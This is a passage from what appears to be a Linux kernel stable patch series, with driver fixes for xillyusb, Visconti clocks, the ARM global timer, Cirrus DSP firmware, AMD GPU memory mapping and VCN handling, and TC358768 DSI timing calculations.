+-	 * workqueue, which rarely does anything.
++	 * device's workqueue and the wakeup work item. This rarely
++	 * does anything.
+ 	 */
+ 	flush_workqueue(xdev->workq);
++	flush_work(&xdev->wakeup_workitem);
+ 
+ 	xdev->num_channels = num_channels;
+ 
+@@ -2242,6 +2259,10 @@ static int __init xillyusb_init(void)
+ {
+ 	int rc = 0;
+ 
++	wakeup_wq = alloc_workqueue(xillyname, 0, 0);
++	if (!wakeup_wq)
++		return -ENOMEM;
++
+ 	if (LOG2_INITIAL_FIFO_BUF_SIZE > PAGE_SHIFT)
+ 		fifo_buf_order = LOG2_INITIAL_FIFO_BUF_SIZE - PAGE_SHIFT;
+ 	else
+@@ -2249,12 +2270,17 @@ static int __init xillyusb_init(void)
+ 
+ 	rc = usb_register(&xillyusb_driver);
+ 
++	if (rc)
++		destroy_workqueue(wakeup_wq);
++
+ 	return rc;
+ }
+ 
+ static void __exit xillyusb_exit(void)
+ {
+ 	usb_deregister(&xillyusb_driver);
++
++	destroy_workqueue(wakeup_wq);
+ }
+ 
+ module_init(xillyusb_init);
+diff --git a/drivers/clk/visconti/pll.c b/drivers/clk/visconti/pll.c
+index 1f3234f226674..e9cd80e085dc3 100644
+--- a/drivers/clk/visconti/pll.c
++++ b/drivers/clk/visconti/pll.c
+@@ -329,12 +329,12 @@ struct visconti_pll_provider * __init visconti_init_pll(struct device_node *np,
+ 	if (!ctx)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	for (i = 0; i < nr_plls; ++i)
+-		ctx->clk_data.hws[i] = ERR_PTR(-ENOENT);
+-
+ 	ctx->node = np;
+ 	ctx->reg_base = base;
+ 	ctx->clk_data.num = nr_plls;
+ 
++	for (i = 0; i < nr_plls; ++i)
++		ctx->clk_data.hws[i] = ERR_PTR(-ENOENT);
++
+ 	return ctx;
+ }
+diff --git a/drivers/clocksource/arm_global_timer.c b/drivers/clocksource/arm_global_timer.c
+index e1c773bb55359..22a58d35a41fa 100644
+--- a/drivers/clocksource/arm_global_timer.c
++++ b/drivers/clocksource/arm_global_timer.c
+@@ -290,18 +290,17 @@ static int gt_clk_rate_change_cb(struct notifier_block *nb,
+ 	switch (event) {
+ 	case PRE_RATE_CHANGE:
+ 	{
+-		int psv;
++		unsigned long psv;
+ 
+-		psv = DIV_ROUND_CLOSEST(ndata->new_rate,
+-					gt_target_rate);
+-
+-		if (abs(gt_target_rate - (ndata->new_rate / psv)) > MAX_F_ERR)
++		psv = DIV_ROUND_CLOSEST(ndata->new_rate, gt_target_rate);
++		if (!psv ||
++		    abs(gt_target_rate - (ndata->new_rate / psv)) > MAX_F_ERR)
+ 			return NOTIFY_BAD;
+ 
+ 		psv--;
+ 
+ 		/* prescaler within legal range? */
+-		if (psv < 0 || psv > GT_CONTROL_PRESCALER_MAX)
++		if (psv > GT_CONTROL_PRESCALER_MAX)
+ 			return NOTIFY_BAD;
+ 
+ 		/*
+diff --git a/drivers/firmware/cirrus/cs_dsp.c b/drivers/firmware/cirrus/cs_dsp.c
+index ee4c32669607f..68005cce01360 100644
+--- a/drivers/firmware/cirrus/cs_dsp.c
++++ b/drivers/firmware/cirrus/cs_dsp.c
+@@ -490,7 +490,7 @@ void cs_dsp_cleanup_debugfs(struct cs_dsp *dsp)
+ {
+ 	cs_dsp_debugfs_clear(dsp);
+ 	debugfs_remove_recursive(dsp->debugfs_root);
+-	dsp->debugfs_root = NULL;
++	dsp->debugfs_root = ERR_PTR(-ENODEV);
+ }
+ EXPORT_SYMBOL_GPL(cs_dsp_cleanup_debugfs);
+ #else
+@@ -2300,6 +2300,11 @@ static int cs_dsp_common_init(struct cs_dsp *dsp)
+ 
+ 	mutex_init(&dsp->pwr_lock);
+ 
++#ifdef CONFIG_DEBUG_FS
++	/* Ensure this is invalid if client never provides a debugfs root */
++	dsp->debugfs_root = ERR_PTR(-ENODEV);
++#endif
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+index dbc842590b253..4b694886715cf 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd.h
+@@ -286,6 +286,7 @@ int amdgpu_amdkfd_gpuvm_map_memory_to_gpu(struct amdgpu_device *adev,
+ 					  struct kgd_mem *mem, void *drm_priv);
+ int amdgpu_amdkfd_gpuvm_unmap_memory_from_gpu(
+ 		struct amdgpu_device *adev, struct kgd_mem *mem, void *drm_priv);
++int amdgpu_amdkfd_gpuvm_dmaunmap_mem(struct kgd_mem *mem, void *drm_priv);
+ int amdgpu_amdkfd_gpuvm_sync_memory(
+ 		struct amdgpu_device *adev, struct kgd_mem *mem, bool intr);
+ int amdgpu_amdkfd_gpuvm_map_gtt_bo_to_kernel(struct kgd_mem *mem,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 7d5fbaaba72f7..d486f5dc052e4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -719,7 +719,7 @@ kfd_mem_dmaunmap_sg_bo(struct kgd_mem *mem,
+ 	enum dma_data_direction dir;
+ 
+ 	if (unlikely(!ttm->sg)) {
+-		pr_err("SG Table of BO is UNEXPECTEDLY NULL");
++		pr_debug("SG Table of BO is NULL");
+ 		return;
+ 	}
+ 
+@@ -1226,8 +1226,6 @@ static void unmap_bo_from_gpuvm(struct kgd_mem *mem,
+ 	amdgpu_vm_clear_freed(adev, vm, &bo_va->last_pt_update);
+ 
+ 	amdgpu_sync_fence(sync, bo_va->last_pt_update);
+-
+-	kfd_mem_dmaunmap_attachment(mem, entry);
+ }
+ 
+ static int update_gpuvm_pte(struct kgd_mem *mem,
+@@ -1282,6 +1280,7 @@ static int map_bo_to_gpuvm(struct kgd_mem *mem,
+ 
+ update_gpuvm_pte_failed:
+ 	unmap_bo_from_gpuvm(mem, entry, sync);
++	kfd_mem_dmaunmap_attachment(mem, entry);
+ 	return ret;
+ }
+ 
+@@ -1852,8 +1851,10 @@ int amdgpu_amdkfd_gpuvm_free_memory_of_gpu(
+ 		mem->va + bo_size * (1 + mem->aql_queue));
+ 
+ 	/* Remove from VM internal data structures */
+-	list_for_each_entry_safe(entry, tmp, &mem->attachments, list)
++	list_for_each_entry_safe(entry, tmp, &mem->attachments, list) {
++		kfd_mem_dmaunmap_attachment(mem, entry);
+ 		kfd_mem_detach(entry);
++	}
+ 
+ 	ret = unreserve_bo_and_vms(&ctx, false, false);
+ 
+@@ -2024,6 +2025,37 @@ int amdgpu_amdkfd_gpuvm_map_memory_to_gpu(
+ 	return ret;
+ }
+ 
++int amdgpu_amdkfd_gpuvm_dmaunmap_mem(struct kgd_mem *mem, void *drm_priv)
++{
++	struct kfd_mem_attachment *entry;
++	struct amdgpu_vm *vm;
++	int ret;
++
++	vm = drm_priv_to_vm(drm_priv);
++
++	mutex_lock(&mem->lock);
++
++	ret = amdgpu_bo_reserve(mem->bo, true);
++	if (ret)
++		goto out;
++
++	list_for_each_entry(entry, &mem->attachments, list) {
++		if (entry->bo_va->base.vm != vm)
++			continue;
++		if (entry->bo_va->base.bo->tbo.ttm &&
++		    !entry->bo_va->base.bo->tbo.ttm->sg)
++			continue;
++
++		kfd_mem_dmaunmap_attachment(mem, entry);
++	}
++
++	amdgpu_bo_unreserve(mem->bo);
++out:
++	mutex_unlock(&mem->lock);
++
++	return ret;
++}
++
+ int amdgpu_amdkfd_gpuvm_unmap_memory_from_gpu(
+ 		struct amdgpu_device *adev, struct kgd_mem *mem, void *drm_priv)
+ {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
+index 1ed2142a6e7bf..3898b67c35bc3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
+@@ -656,16 +656,24 @@ int amdgpu_ctx_ioctl(struct drm_device *dev, void *data,
+ 
+ 	switch (args->in.op) {
+ 	case AMDGPU_CTX_OP_ALLOC_CTX:
++		if (args->in.flags)
++			return -EINVAL;
+ 		r = amdgpu_ctx_alloc(adev, fpriv, filp, priority, &id);
+ 		args->out.alloc.ctx_id = id;
+ 		break;
+ 	case AMDGPU_CTX_OP_FREE_CTX:
++		if (args->in.flags)
++			return -EINVAL;
+ 		r = amdgpu_ctx_free(fpriv, id);
+ 		break;
+ 	case AMDGPU_CTX_OP_QUERY_STATE:
++		if (args->in.flags)
++			return -EINVAL;
+ 		r = amdgpu_ctx_query(adev, fpriv, id, &args->out);
+ 		break;
+ 	case AMDGPU_CTX_OP_QUERY_STATE2:
++		if (args->in.flags)
++			return -EINVAL;
+ 		r = amdgpu_ctx_query2(adev, fpriv, id, &args->out);
+ 		break;
+ 	case AMDGPU_CTX_OP_GET_STABLE_PSTATE:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp_ta.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp_ta.c
+index 0988e00612e51..09a995df95e85 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp_ta.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp_ta.c
+@@ -148,6 +148,9 @@ static ssize_t ta_if_load_debugfs_write(struct file *fp, const char *buf, size_t
+ 	if (ret)
+ 		return -EINVAL;
+ 
++	if (ta_bin_len > PSP_1_MEG)
++		return -EINVAL;
++
+ 	copy_pos += sizeof(uint32_t);
+ 
+ 	ta_bin = kzalloc(ta_bin_len, GFP_KERNEL);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+index 48e612023d0c7..e2475f656ff20 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+@@ -239,6 +239,10 @@ int amdgpu_vcn_sw_init(struct amdgpu_device *adev)
+ 		return r;
+ 	}
+ 
++	/* from vcn4 and above, only unified queue is used */
++	adev->vcn.using_unified_queue =
++		adev->ip_versions[UVD_HWIP][0] >= IP_VERSION(4, 0, 0);
++
+ 	hdr = (const struct common_firmware_header *)adev->vcn.fw->data;
+ 	adev->vcn.fw_version = le32_to_cpu(hdr->ucode_version);
+ 
+@@ -357,18 +361,6 @@ int amdgpu_vcn_sw_fini(struct amdgpu_device *adev)
+ 	return 0;
+ }
+ 
+-/* from vcn4 and above, only unified queue is used */
+-static bool amdgpu_vcn_using_unified_queue(struct amdgpu_ring *ring)
+-{
+-	struct amdgpu_device *adev = ring->adev;
+-	bool ret = false;
+-
+-	if (adev->ip_versions[UVD_HWIP][0] >= IP_VERSION(4, 0, 0))
+-		ret = true;
+-
+-	return ret;
+-}
+-
+ bool amdgpu_vcn_is_disabled_vcn(struct amdgpu_device *adev, enum vcn_ring_type type, uint32_t vcn_instance)
+ {
+ 	bool ret = false;
+@@ -480,7 +472,9 @@ static void amdgpu_vcn_idle_work_handler(struct work_struct *work)
+ 			fence[j] += amdgpu_fence_count_emitted(&adev->vcn.inst[j].ring_enc[i]);
+ 		}
+ 
+-		if (adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG)	{
++		/* Only set DPG pause for VCN3 or below, VCN4 and above will be handled by FW */
++		if (adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG &&
++		    !adev->vcn.using_unified_queue) {
+ 			struct dpg_pause_state new_state;
+ 
+ 			if (fence[j] ||
+@@ -526,7 +520,9 @@ void amdgpu_vcn_ring_begin_use(struct amdgpu_ring *ring)
+ 	amdgpu_device_ip_set_powergating_state(adev, AMD_IP_BLOCK_TYPE_VCN,
+ 	       AMD_PG_STATE_UNGATE);
+ 
+-	if (adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG)	{
++	/* Only set DPG pause for VCN3 or below, VCN4 and above will be handled by FW */
++	if (adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG &&
++	    !adev->vcn.using_unified_queue) {
+ 		struct dpg_pause_state new_state;
+ 
+ 		if (ring->funcs->type == AMDGPU_RING_TYPE_VCN_ENC) {
+@@ -552,8 +548,12 @@ void amdgpu_vcn_ring_begin_use(struct amdgpu_ring *ring)
+ 
+ void amdgpu_vcn_ring_end_use(struct amdgpu_ring *ring)
+ {
++	struct amdgpu_device *adev = ring->adev;
++
++	/* Only set DPG pause for VCN3 or below, VCN4 and above will be handled by FW */
+ 	if (ring->adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG &&
+-		ring->funcs->type == AMDGPU_RING_TYPE_VCN_ENC)
++	    ring->funcs->type == AMDGPU_RING_TYPE_VCN_ENC &&
++	    !adev->vcn.using_unified_queue)
+ 		atomic_dec(&ring->adev->vcn.inst[ring->me].dpg_enc_submission_cnt);
+ 
+ 	atomic_dec(&ring->adev->vcn.total_submission_cnt);
+@@ -806,12 +806,11 @@ static int amdgpu_vcn_dec_sw_send_msg(struct amdgpu_ring *ring,
+ 	struct amdgpu_job *job;
+ 	struct amdgpu_ib *ib;
+ 	uint64_t addr = AMDGPU_GPU_PAGE_ALIGN(ib_msg->gpu_addr);
+-	bool sq = amdgpu_vcn_using_unified_queue(ring);
+ 	uint32_t *ib_checksum;
+ 	uint32_t ib_pack_in_dw;
+ 	int i, r;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		ib_size_dw += 8;
+ 
+ 	r = amdgpu_job_alloc_with_ib(adev, ib_size_dw * 4,
+@@ -823,7 +822,7 @@ static int amdgpu_vcn_dec_sw_send_msg(struct amdgpu_ring *ring,
+ 	ib->length_dw = 0;
+ 
+ 	/* single queue headers */
+-	if (sq) {
++	if (adev->vcn.using_unified_queue) {
+ 		ib_pack_in_dw = sizeof(struct amdgpu_vcn_decode_buffer) / sizeof(uint32_t)
+ 						+ 4 + 2; /* engine info + decoding ib in dw */
+ 		ib_checksum = amdgpu_vcn_unified_ring_ib_header(ib, ib_pack_in_dw, false);
+@@ -842,7 +841,7 @@ static int amdgpu_vcn_dec_sw_send_msg(struct amdgpu_ring *ring,
+ 	for (i = ib->length_dw; i < ib_size_dw; ++i)
+ 		ib->ptr[i] = 0x0;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		amdgpu_vcn_unified_ring_ib_checksum(&ib_checksum, ib_pack_in_dw);
+ 
+ 	r = amdgpu_job_submit_direct(job, ring, &f);
+@@ -932,15 +931,15 @@ static int amdgpu_vcn_enc_get_create_msg(struct amdgpu_ring *ring, uint32_t hand
+ 					 struct dma_fence **fence)
+ {
+ 	unsigned int ib_size_dw = 16;
++	struct amdgpu_device *adev = ring->adev;
+ 	struct amdgpu_job *job;
+ 	struct amdgpu_ib *ib;
+ 	struct dma_fence *f = NULL;
+ 	uint32_t *ib_checksum = NULL;
+ 	uint64_t addr;
+-	bool sq = amdgpu_vcn_using_unified_queue(ring);
+ 	int i, r;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		ib_size_dw += 8;
+ 
+ 	r = amdgpu_job_alloc_with_ib(ring->adev, ib_size_dw * 4,
+@@ -953,7 +952,7 @@ static int amdgpu_vcn_enc_get_create_msg(struct amdgpu_ring *ring, uint32_t hand
+ 
+ 	ib->length_dw = 0;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		ib_checksum = amdgpu_vcn_unified_ring_ib_header(ib, 0x11, true);
+ 
+ 	ib->ptr[ib->length_dw++] = 0x00000018;
+@@ -975,7 +974,7 @@ static int amdgpu_vcn_enc_get_create_msg(struct amdgpu_ring *ring, uint32_t hand
+ 	for (i = ib->length_dw; i < ib_size_dw; ++i)
+ 		ib->ptr[i] = 0x0;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		amdgpu_vcn_unified_ring_ib_checksum(&ib_checksum, 0x11);
+ 
+ 	r = amdgpu_job_submit_direct(job, ring, &f);
+@@ -998,15 +997,15 @@ static int amdgpu_vcn_enc_get_destroy_msg(struct amdgpu_ring *ring, uint32_t han
+ 					  struct dma_fence **fence)
+ {
+ 	unsigned int ib_size_dw = 16;
++	struct amdgpu_device *adev = ring->adev;
+ 	struct amdgpu_job *job;
+ 	struct amdgpu_ib *ib;
+ 	struct dma_fence *f = NULL;
+ 	uint32_t *ib_checksum = NULL;
+ 	uint64_t addr;
+-	bool sq = amdgpu_vcn_using_unified_queue(ring);
+ 	int i, r;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		ib_size_dw += 8;
+ 
+ 	r = amdgpu_job_alloc_with_ib(ring->adev, ib_size_dw * 4,
+@@ -1019,7 +1018,7 @@ static int amdgpu_vcn_enc_get_destroy_msg(struct amdgpu_ring *ring, uint32_t han
+ 
+ 	ib->length_dw = 0;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		ib_checksum = amdgpu_vcn_unified_ring_ib_header(ib, 0x11, true);
+ 
+ 	ib->ptr[ib->length_dw++] = 0x00000018;
+@@ -1041,7 +1040,7 @@ static int amdgpu_vcn_enc_get_destroy_msg(struct amdgpu_ring *ring, uint32_t han
+ 	for (i = ib->length_dw; i < ib_size_dw; ++i)
+ 		ib->ptr[i] = 0x0;
+ 
+-	if (sq)
++	if (adev->vcn.using_unified_queue)
+ 		amdgpu_vcn_unified_ring_ib_checksum(&ib_checksum, 0x11);
+ 
+ 	r = amdgpu_job_submit_direct(job, ring, &f);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.h
+index 253ea6b159df9..165d841e0aaaf 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.h
+@@ -271,6 +271,7 @@ struct amdgpu_vcn {
+ 
+ 	struct ras_common_if    *ras_if;
+ 	struct amdgpu_vcn_ras   *ras;
++	bool using_unified_queue;
+ };
+ 
+ struct amdgpu_fw_shared_rb_ptrs_struct {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+index 69b3829bbe53f..370d02bdde862 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vm_pt.c
+@@ -754,11 +754,15 @@ int amdgpu_vm_pde_update(struct amdgpu_vm_update_params *params,
+ 			 struct amdgpu_vm_bo_base *entry)
+ {
+ 	struct amdgpu_vm_bo_base *parent = amdgpu_vm_pt_parent(entry);
+-	struct amdgpu_bo *bo = parent->bo, *pbo;
++	struct amdgpu_bo *bo, *pbo;
+ 	struct amdgpu_vm *vm = params->vm;
+ 	uint64_t pde, pt, flags;
+ 	unsigned int level;
+ 
++	if (WARN_ON(!parent))
++		return -EINVAL;
++
++	bo = parent->bo;
+ 	for (level = 0, pbo = bo->parent; pbo; ++level)
+ 		pbo = pbo->parent;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/imu_v11_0.c b/drivers/gpu/drm/amd/amdgpu/imu_v11_0.c
+index 95548c512f4fb..3c21128fa1d82 100644
+--- a/drivers/gpu/drm/amd/amdgpu/imu_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/imu_v11_0.c
+@@ -38,7 +38,7 @@ MODULE_FIRMWARE("amdgpu/gc_11_0_3_imu.bin");
+ 
+ static int imu_v11_0_init_microcode(struct amdgpu_device *adev)
+ {
+-	char fw_name[40];
++	char fw_name[45];
+ 	char ucode_prefix[30];
+ 	int err;
+ 	const struct imu_firmware_header_v1_0 *imu_hdr;
+diff --git a/drivers/gpu/drm/amd/amdgpu/jpeg_v2_0.c b/drivers/gpu/drm/amd/amdgpu/jpeg_v2_0.c
+index f3c1af5130abc..3301ad980f28a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/jpeg_v2_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/jpeg_v2_0.c
+@@ -541,11 +541,11 @@ void jpeg_v2_0_dec_ring_emit_ib(struct amdgpu_ring *ring,
+ 
+ 	amdgpu_ring_write(ring, PACKETJ(mmUVD_LMI_JRBC_IB_VMID_INTERNAL_OFFSET,
+ 		0, 0, PACKETJ_TYPE0));
+-	amdgpu_ring_write(ring, (vmid | (vmid << 4)));
++	amdgpu_ring_write(ring, (vmid | (vmid << 4) | (vmid << 8)));
+ 
+ 	amdgpu_ring_write(ring, PACKETJ(mmUVD_LMI_JPEG_VMID_INTERNAL_OFFSET,
+ 		0, 0, PACKETJ_TYPE0));
+-	amdgpu_ring_write(ring, (vmid | (vmid << 4)));
++	amdgpu_ring_write(ring, (vmid | (vmid << 4) | (vmid << 8)));
+ 
+ 	amdgpu_ring_write(ring,	PACKETJ(mmUVD_LMI_JRBC_IB_64BIT_BAR_LOW_INTERNAL_OFFSET,
+ 		0, 0, PACKETJ_TYPE0));
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index b0f475d51ae7e..e3cd66c4d95d8 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1400,17 +1400,23 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ 			goto sync_memory_failed;
+ 		}
+ 	}
+-	mutex_unlock(&p->mutex);
+ 
+-	if (flush_tlb) {
+-		/* Flush TLBs after waiting for the page table updates to complete */
+-		for (i = 0; i < args->n_devices; i++) {
+-			peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
+-			if (WARN_ON_ONCE(!peer_pdd))
+-				continue;
++	/* Flush TLBs after waiting for the page table updates to complete */
++	for (i = 0; i < args->n_devices; i++) {
++		peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
++		if (WARN_ON_ONCE(!peer_pdd))
++			continue;
++		if (flush_tlb)
+ 			kfd_flush_tlb(peer_pdd, TLB_FLUSH_HEAVYWEIGHT);
+-		}
++
++		/* Remove dma mapping after tlb flush to avoid IO_PAGE_FAULT */
++		err = amdgpu_amdkfd_gpuvm_dmaunmap_mem(mem, peer_pdd->drm_priv);
++		if (err)
++			goto sync_memory_failed;
+ 	}
++
++	mutex_unlock(&p->mutex);
++
+ 	kfree(devices_arr);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+index d6c5d48c878ec..416168c7dcc52 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -3633,7 +3633,7 @@ void dcn10_set_cursor_position(struct pipe_ctx *pipe_ctx)
+ 						(int)hubp->curs_attr.width || pos_cpy.x
+ 						<= (int)hubp->curs_attr.width +
+ 						pipe_ctx->plane_state->src_rect.x) {
+-						pos_cpy.x = 2 * viewport_width - temp_x;
++						pos_cpy.x = temp_x + viewport_width;
+ 					}
+ 				}
+ 			} else {
+diff --git a/drivers/gpu/drm/bridge/tc358768.c b/drivers/gpu/drm/bridge/tc358768.c
+index 8429b6518b502..aabdb5c74d936 100644
+--- a/drivers/gpu/drm/bridge/tc358768.c
++++ b/drivers/gpu/drm/bridge/tc358768.c
+@@ -9,6 +9,7 @@
+ #include <linux/gpio/consumer.h>
+ #include <linux/i2c.h>
+ #include <linux/kernel.h>
++#include <linux/math64.h>
+ #include <linux/media-bus-format.h>
+ #include <linux/minmax.h>
+ #include <linux/module.h>
+@@ -158,6 +159,7 @@ struct tc358768_priv {
+ 	u32 frs;	/* PLL Freqency range for HSCK (post divider) */
+ 
+ 	u32 dsiclk;	/* pll_clk / 2 */
++	u32 pclk;	/* incoming pclk rate */
+ };
+ 
+ static inline struct tc358768_priv *dsi_host_to_tc358768(struct mipi_dsi_host
+@@ -381,6 +383,7 @@ static int tc358768_calc_pll(struct tc358768_priv *priv,
+ 	priv->prd = best_prd;
+ 	priv->frs = frs;
+ 	priv->dsiclk = best_pll / 2;
++	priv->pclk = mode->clock * 1000;
+ 
+ 	return 0;
+ }
+@@ -639,6 +642,28 @@ static u32 tc358768_ps_to_ns(u32 ps)
+ 	return ps / 1000;
+ }
+ 
++static u32 tc358768_dpi_to_ns(u32 val, u32 pclk)
++{
++	return (u32)div_u64((u64)val * NANO, pclk);
++}
++
++/* Convert value in DPI pixel clock units to DSI byte count */
++static u32 tc358768_dpi_to_dsi_bytes(struct tc358768_priv *priv, u32 val)
++{
++	u64 m = (u64)val * priv->dsiclk / 4 * priv->dsi_lanes;
++	u64 n = priv->pclk;
++
++	return (u32)div_u64(m + n - 1, n);
++}
++
++static u32 tc358768_dsi_bytes_to_ns(struct tc358768_priv *priv, u32 val)
++{
++	u64 m = (u64)val * NANO;
++	u64 n = priv->dsiclk / 4 * priv->dsi_lanes;
++
++	return (u32)div_u64(m, n);
++}
++
+ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ {
+ 	struct tc358768_priv *priv = bridge_to_tc358768(bridge);
+@@ -648,11 +673,19 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	s32 raw_val;
+ 	const struct drm_display_mode *mode;
+ 	u32 hsbyteclk_ps, dsiclk_ps, ui_ps;
+-	u32 dsiclk, hsbyteclk, video_start;
+-	const u32 internal_delay = 40;
++	u32 dsiclk, hsbyteclk;
+ 	int ret, i;
+ 	struct videomode vm;
+ 	struct device *dev = priv->dev;
++	/* In pixelclock units */
++	u32 dpi_htot, dpi_data_start;
++	/* In byte units */
++	u32 dsi_dpi_htot, dsi_dpi_data_start;
++	u32 dsi_hsw, dsi_hbp, dsi_hact, dsi_hfp;
++	const u32 dsi_hss = 4; /* HSS is a short packet (4 bytes) */
++	/* In hsbyteclk units */
++	u32 dsi_vsdly;
++	const u32 internal_dly = 40;
+ 
+ 	if (mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS) {
+ 		dev_warn_once(dev, "Non-continuous mode unimplemented, falling back to continuous\n");
+@@ -687,27 +720,23 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	case MIPI_DSI_FMT_RGB888:
+ 		val |= (0x3 << 4);
+ 		hact = vm.hactive * 3;
+-		video_start = (vm.hsync_len + vm.hback_porch) * 3;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_24;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666:
+ 		val |= (0x4 << 4);
+ 		hact = vm.hactive * 3;
+-		video_start = (vm.hsync_len + vm.hback_porch) * 3;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_18;
+ 		break;
+ 
+ 	case MIPI_DSI_FMT_RGB666_PACKED:
+ 		val |= (0x4 << 4) | BIT(3);
+ 		hact = vm.hactive * 18 / 8;
+-		video_start = (vm.hsync_len + vm.hback_porch) * 18 / 8;
+ 		data_type = MIPI_DSI_PIXEL_STREAM_3BYTE_18;
+ 		break;
+ 
+ 	case MIPI_DSI_FMT_RGB565:
+ 		val |= (0x5 << 4);
+ 		hact = vm.hactive * 2;
+-		video_start = (vm.hsync_len + vm.hback_porch) * 2;
+ 		data_type = MIPI_DSI_PACKED_PIXEL_STREAM_16;
+ 		break;
+ 	default:
+@@ -717,9 +746,152 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 		return;
+ 	}
+ 
++	/*
++	 * There are three important things to make TC358768 work correctly,
++	 * which are not trivial to manage:
++	 *
++	 * 1. Keep the DPI line-time and the DSI line-time as close to each
++	 *    other as possible.
++	 * 2. TC358768 goes to LP mode after each line's active area. The DSI
++	 *    HFP period has to be long enough for entering and exiting LP mode.
++	 *    But it is not clear how to calculate this.
++	 * 3. VSDly (video start delay) has to be long enough to ensure that the
++	 *    DSI TX does not start transmitting until we have started receiving
++	 *    pixel data from the DPI input. It is not clear how to calculate
++	 *    this either.
++	 */
++
++	dpi_htot = vm.hactive + vm.hfront_porch + vm.hsync_len + vm.hback_porch;
++	dpi_data_start = vm.hsync_len + vm.hback_porch;
++
++	dev_dbg(dev, "dpi horiz timing (pclk): %u + %u + %u + %u = %u\n",
++		vm.hsync_len, vm.hback_porch, vm.hactive, vm.hfront_porch,
++		dpi_htot);
++
++	dev_dbg(dev, "dpi horiz timing (ns): %u + %u + %u + %u = %u\n",
++		tc358768_dpi_to_ns(vm.hsync_len, vm.pixelclock),
++		tc358768_dpi_to_ns(vm.hback_porch, vm.pixelclock),
++		tc358768_dpi_to_ns(vm.hactive, vm.pixelclock),
++		tc358768_dpi_to_ns(vm.hfront_porch, vm.pixelclock),
++		tc358768_dpi_to_ns(dpi_htot, vm.pixelclock));
++
++	dev_dbg(dev, "dpi data start (ns): %u + %u = %u\n",
++		tc358768_dpi_to_ns(vm.hsync_len, vm.pixelclock),
++		tc358768_dpi_to_ns(vm.hback_porch, vm.pixelclock),
++		tc358768_dpi_to_ns(dpi_data_start, vm.pixelclock));
++
++	dsi_dpi_htot = tc358768_dpi_to_dsi_bytes(priv, dpi_htot);
++	dsi_dpi_data_start = tc358768_dpi_to_dsi_bytes(priv, dpi_data_start);
++
++	if (dsi_dev->mode_flags & MIPI_DSI_MODE_VIDEO_SYNC_PULSE) {
